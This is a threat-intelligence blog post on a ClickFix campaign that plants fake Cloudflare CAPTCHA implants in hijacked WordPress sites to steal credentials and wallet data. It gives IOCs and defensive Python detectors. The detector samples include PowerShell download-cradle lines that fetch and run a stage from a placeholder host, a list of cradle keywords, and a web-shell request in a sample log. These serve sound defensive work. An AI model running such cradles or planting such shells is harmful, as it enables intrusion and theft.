
The Fake Cloudflare Lure: A Global WordPress Compromise Leading to Credential Theft


Executive Summary

The compromise of legitimate, trusted infrastructure is among the hardest threats to defend against, because every reputation signal points the wrong way. Rapid7 Labs recently documented a widespread campaign that compromises legitimate, high-trust WordPress websites around the world. The operation, active since December 2025, injects a malicious "ClickFix" implant that impersonates a Cloudflare human verification challenge (CAPTCHA), turning the site's own credibility into the lure.

The objective of the campaign is the theft of credentials and digital wallet data from Windows systems. Infected sites include regional news outlets, local businesses and the official web page of a United States Senate candidate, which shows both the scale of the operation and the actor's willingness to hit high-visibility hosts. SecLookup's threat intelligence platform has been detecting and blocking the infrastructure involved, preventing users from inadvertently falling into the trap. This post walks through the infection chain, the TTPs and the indicators of compromise (IOCs) associated with the operation.

Threat Analysis

Given the scale and the specific focus on wallets and credentials, the threat actor behind this campaign is likely an affiliate of a larger credential-stealing operation. Their primary TTP (Tactics, Techniques and Procedures) is the compromise of legitimate websites (a strategic web compromise, in effect a watering hole) followed by social engineering of the site's visitors. Unlike a classic phishing campaign, no lure e-mail is needed: the victim's own browsing brings them to the implant.

The Lure: Impersonating Security

The most deceptive aspect of this attack is the user interface. The malicious script mimics a standard Cloudflare challenge page. When a visitor lands on a compromised site, they are presented with a popup claiming a security check is required.

[Browser Popup]
"Please wait while we check your browser..."
[Button] "Check my browser"

This "ClickFix" technique relies on the user's expectation that a security check is a normal price for reaching the site they want, and on their fear of being blocked. Once the user clicks the button, the browser's address bar often changes, and a script is executed to download the malicious payload.

The Infection Chain

The malware chain is designed to operate entirely in memory, which leaves traditional file-based antivirus (AV) with little to scan. Delivery is multi-stage:

  1. Obfuscated JavaScript: Upon clicking the fake CAPTCHA, an obfuscated JavaScript file is loaded from a remote server.

  2. PowerShell Stagers: The JavaScript executes PowerShell commands to download and run the next stage of the payload.

  3. In-Memory Shellcode: The final payload is delivered as raw shellcode and injected into inconspicuous Windows processes (such as explorer.exe or svchost.exe). No file is dropped, so detections keyed on file creation never fire; the injection itself, however, is visible to EDR that monitors cross-process memory writes and remote thread creation.

MITRE ATT&CK Mapping

This campaign maps to several key techniques in the MITRE ATT&CK framework:

  • T1189: Drive-by Compromise: Victims reach the implant by visiting a legitimate, compromised website in the normal course of browsing; no phishing message is required.

  • T1204: User Execution: The fake verification page tricks the visitor into triggering the payload themselves.

  • T1059.001: Command and Scripting Interpreter: PowerShell: Used extensively for staging and execution of the later stages.

  • T1027: Obfuscated Files or Information: The JavaScript payload is heavily obfuscated to evade static analysis.

  • T1055: Process Injection: Shellcode injection into legitimate processes.

  • T1555.003: Credentials from Password Stores: Credentials from Web Browsers: Saved browser credentials, and the data of wallet browser extensions, live in the browser profile that the final payload harvests.

The legitimacy of the hosting domain makes detection difficult; security teams must focus on behavioral monitoring (e.g., unexpected PowerShell execution from browser contexts) rather than on domain reputation alone.
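The behavioral angle above, as an added example that is not part of the original post and not Rapid7's or SecLookup's detection logic: a small scoring rule run over constructed Sysmon-style process-creation events. It alerts when a browser spawns a script interpreter, or when an interpreter's command line (including the base64/UTF-16LE body of an -EncodedCommand, which it decodes first) carries download-cradle and evasion tokens. The event fields, the URLs in the sample command lines and the threshold are assumptions for illustration.

```python
import base64
import re
from pathlib import PureWindowsPath

# Parents that should never launch a script interpreter directly.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe", "iexplore.exe"}
# Children a ClickFix-style lure typically ends up starting.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download-cradle / evasion tokens; each family found adds 2 to the score.
CRADLE_TOKENS = [
    (r"(?i)\biex\b|invoke-expression", "iex"),
    (r"(?i)\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bwget\b", "download"),
    (r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden-window"),
    (r"(?i)-nop\b|-noprofile", "noprofile"),
    (r"(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", "encoded"),
]
ENCODED_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
ALERT_THRESHOLD = 4  # assumed tuning value

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand body (base64 of UTF-16LE text), or '' if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    parent = PureWindowsPath(ev["ParentImage"]).name.lower()
    child = PureWindowsPath(ev["Image"]).name.lower()
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    if parent in BROWSERS:
        score += 3
        reasons.append("browser-parent")
    if child in INTERPRETERS:
        score += 1
        reasons.append("script-interpreter")
    # Scan the visible command line and the decoded encoded command together.
    text = cmd + " " + decode_encoded_command(cmd)
    for pattern, name in CRADLE_TOKENS:
        if re.search(pattern, text):
            score += 2
            reasons.append(name)
    return score, reasons

def detect(events):
    """Return alerts for every event at or above the threshold."""
    alerts = []
    for ev in events:
        s, r = score_event(ev)
        if s >= ALERT_THRESHOLD:
            alerts.append({"image": ev["Image"], "score": s, "reasons": r})
    return alerts

# Constructed sample events (hypothetical paths and URLs, not captured telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EXPLORER = r"C:\Windows\explorer.exe"
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s2')"
ENC = base64.b64encode(STAGE2.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": CHROME, "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -nop -c "iex (irm https://example.invalid/stage2)"'},
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f"powershell.exe -nop -EncodedCommand {ENC}"},
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": CHROME, "Image": CHROME, "CommandLine": "chrome.exe --type=renderer"},
    {"ParentImage": CHROME, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The browser-parent weight alone does not reach the threshold, so ordinary browser helper processes (renderers, WebView) stay quiet, while a browser spawning cmd.exe or PowerShell fires even with an innocuous command line. Decoding the encoded command before matching is what catches the second event; matching only the raw command line would see nothing but a base64 blob.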

Indicators of Compromise (IOCs)

SecLookup has aggregated the following IOCs based on the Rapid7 research and our own telemetry. All domains listed below have been confirmed malicious and are currently blocked by SecLookup.

Malicious Domains

The following domains were hosting the malicious JavaScript implants and the fake CAPTCHA lures.

wepro.ch
goveanrs.org
namzcp.org
surveygifts.org
beta-charts.org
govearali.org
getalib.org

IP Addresses

The infrastructure associated with this campaign utilizes the following IP addresses to serve the malicious payloads and redirect traffic.

91.92.240.219
172.94.9.187
94.154.35.115
178.16.53.70
94.154.35.152

Malicious URLs

Users were redirected to the following URLs to download the payloads. Note the recurring jsrepo path with an rnd cache-busting query parameter, a pattern often seen in script-injection campaigns; the two truncated jsre entries are reproduced as published. One entry, obf-io.deobfuscate.io, is a public JavaScript deobfuscation service and most likely reflects analyst tooling rather than attacker infrastructure, so verify it against your own telemetry before adding it to a block list.

https://ligovera.shop/jsrepo?rnd=
https://govearali.org/jsrepo?rnd=
https://obf-io.deobfuscate.io/
https://goveanrs.org/jsrepo?rnd=
https://getalib.org/jsre
https://alianzeg.shop/jsrepo?rnd=
https://ztdaliweb.shop/jsre
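A practical use of the domain and URL indicators above is to sweep a site's rendered pages (or its stored post and option content) for the injected loader. The following is an added example, not code from the original post and not a Rapid7 or SecLookup tool: it extracts every external script reference from HTML and flags those whose host is on the page's IOC list or whose path is the jsrepo/jsre loader, so a freshly rotated domain still shows up on the path alone. The sample HTML is constructed; cdn.example.invalid is a hypothetical host used to show that second case.

```python
import re
from urllib.parse import urlparse

# Domains taken from this page's IOC list: the seven "Malicious Domains" plus the
# hosts of the listed "Malicious URLs" (the deobfuscate.io analysis service is left out).
IOC_DOMAINS = {
    "wepro.ch", "goveanrs.org", "namzcp.org", "surveygifts.org", "beta-charts.org",
    "govearali.org", "getalib.org", "ligovera.shop", "alianzeg.shop", "ztdaliweb.shop",
}

# <script ... src=VALUE> with double, single or no quotes; the lookbehind avoids data-src.
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*?(?<![\w-])src\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# Loader path seen across the listed URLs: /jsrepo (usually with ?rnd=) or the truncated /jsre.
JSREPO_RE = re.compile(r"^/jsre(?:po)?$", re.I)

def _split(src):
    """Return (host, path) for absolute, protocol-relative (//host/..) or relative src values."""
    if src.startswith("//"):
        src = "https:" + src
    u = urlparse(src)
    return (u.hostname or "").lower(), u.path

def is_ioc_host(host):
    """True for a listed domain or any subdomain of one."""
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)

def find_injected_scripts(html):
    """Return every external script whose host is a listed IOC or whose path is the loader."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        host, path = _split(src)
        reasons = []
        if is_ioc_host(host):
            reasons.append("ioc-domain")
        if JSREPO_RE.match(path):
            reasons.append("jsrepo-path")
        if reasons:
            hits.append({"src": src, "host": host, "reasons": reasons})
    return hits

# Constructed page fragment: two legitimate scripts, one implant on a listed domain,
# and one on a hypothetical rotated host that only the path heuristic catches.
SAMPLE_HTML = """
<script src="/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
<script type="text/javascript" src='https://govearali.org/jsrepo?rnd=1737000000'></script>
<script src=//cdn.example.invalid/jsre></script>
"""

if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_HTML):
        print(hit)
```

Run it over wp_posts.post_content and wp_options (widgets, theme customizer settings) as well as over fetched pages, since this kind of implant is frequently stored in the database rather than in theme files. Treat the path heuristic as a triage signal, not a verdict: a jsrepo path on an unknown host warrants pulling the script and deobfuscating it.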

Detection Pattern

The pattern below matches routine WordPress traffic: the login, cron and XML-RPC endpoints, the core admin, includes and content paths, feeds, the REST API, WooCommerce AJAX calls, static assets, sitemaps and robots.txt. It is best used as an exclusion filter when reviewing a compromised site's access logs rather than as an attack signature: strip the lines it matches and what remains (unfamiliar paths, direct POSTs to PHP files, scripted user agents) is what deserves a look. Two caveats: because wp-content matches everything beneath that directory, check for PHP files under wp-content/uploads before applying the filter, and note that brute-force traffic against wp-login.php and xmlrpc.php is hidden by it and should be counted separately. The dots in the extension alternatives are escaped and anchored to the end of the path or to a query string so that ".js" does not match any path that merely contains "js":

wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|\.(css|js|ico|png|gif|bmp|jpe?g|tiff|mp[34g]|wmv|zip|rar|exe|pdf|txt)(\?|$)|sitemap[^/]*\.xml|robots\.txt
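Applying the filter to a log is where the wp-content caveat bites, so here is an added example (not code from the original post) that runs the pattern over a few constructed Apache combined-format lines. It first pulls out PHP requests under wp-content (which the noise filter would otherwise swallow), then discards the routine traffic, and hands back what is left for review. The sample IPs, paths and plugin name are invented for illustration.

```python
import re

# The page's exclusion pattern with escaped dots and anchored extensions.
WP_NOISE_RE = re.compile(
    r"wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|/feed|wp-json|\?wc-ajax"
    r"|\.(?:css|js|ico|png|gif|bmp|jpe?g|tiff|mp[34g]|wmv|zip|rar|exe|pdf|txt)(?:\?|$)"
    r"|sitemap[^/]*\.xml|robots\.txt",
    re.I,
)
# Heuristic checked BEFORE the noise filter: PHP served straight out of wp-content.
# uploads/ should never execute PHP, and plugin/theme code is normally reached through
# wp-admin/admin-ajax.php rather than by direct request.
WP_CONTENT_PHP_RE = re.compile(r"^/wp-content/.*\.php(?:\?|$)", re.I)

# Apache/nginx combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def triage(lines):
    """Split requests into flagged (PHP under wp-content), noise (routine WP traffic) and review."""
    flagged, review, noise = [], [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if WP_CONTENT_PHP_RE.match(path):
            flagged.append((rec["ip"], rec["method"], path))
        elif WP_NOISE_RE.search(path):
            noise.append(path)
        else:
            review.append((rec["ip"], rec["method"], path))
    return {"flagged": flagged, "review": review, "noise": noise}

# Constructed sample log (documentation-range IPs, invented paths).
SAMPLE_LOG = """
203.0.113.5 - - [12/Jan/2026:09:14:02 +0000] "GET /wp-content/themes/twentytwentyfour/style.css?ver=1.0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jan/2026:09:14:02 +0000] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87533 "-" "Mozilla/5.0"
198.51.100.77 - - [12/Jan/2026:09:15:40 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "python-requests/2.31"
198.51.100.77 - - [12/Jan/2026:09:16:01 +0000] "POST /wp-content/uploads/2026/01/cache.php HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.77 - - [12/Jan/2026:09:16:30 +0000] "GET /wp-content/plugins/some-plugin/assets/loader.php?x=1 HTTP/1.1" 200 1230 "-" "python-requests/2.31"
203.0.113.9 - - [12/Jan/2026:09:17:12 +0000] "GET /?p=123 HTTP/1.1" 200 44512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2026:09:17:13 +0000] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for key in ("flagged", "review"):
        print(key, result[key])
```

Ordering matters: the uploads web-shell request matches WP_NOISE_RE on its own because of the wp-content alternative, so a pipeline that applies the exclusion first would never see it. Everything in the review bucket is ordinary traffic here, which is the point of the filter: it shrinks the log to what a human can actually read.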

SecLookup Detection

SecLookup maintains a proactive threat intelligence platform designed to identify and neutralize threats before they impact our users. In response to the findings detailed by Rapid7 Labs, SecLookup has immediately updated its threat feed to block the domains and IP addresses identified above.

Recommendations

To defend against this sophisticated credential-stealing campaign, organizations should implement the following measures:

  1. Browser and System Hygiene: Keep browsers and operating systems fully patched to reduce attack surface, but recognise that this campaign does not need a browser exploit: it relies on the user running the payload after the fake check, so patching alone will not stop it.

  2. Verify CAPTCHAs: Be skeptical of any CAPTCHA popup. If a site forces you to click a "Check my browser" button to proceed, close the tab. Legitimate challenges (including Cloudflare's) are rendered on the page itself, do not change the address bar, and never ask you to run a command or paste anything outside the browser.

  3. Endpoint Detection and Response (EDR): Since the malware executes in-memory, relying on traditional antivirus is insufficient. Ensure your EDR solution is configured to monitor for PowerShell execution and process injection events originating from browser processes.

  4. Web Application Firewall (WAF) and Site Integrity: On WordPress sites, use WAF rules against the attacks that lead to implant injection (brute force against wp-login.php and xmlrpc.php, exploitation of vulnerable plugins and themes), keep plugins and themes updated, and periodically scan theme files and the database for unexpected external script references.

  5. User Awareness: Train users to recognize that a "security check" popup is not a standard part of web browsing and should be ignored.
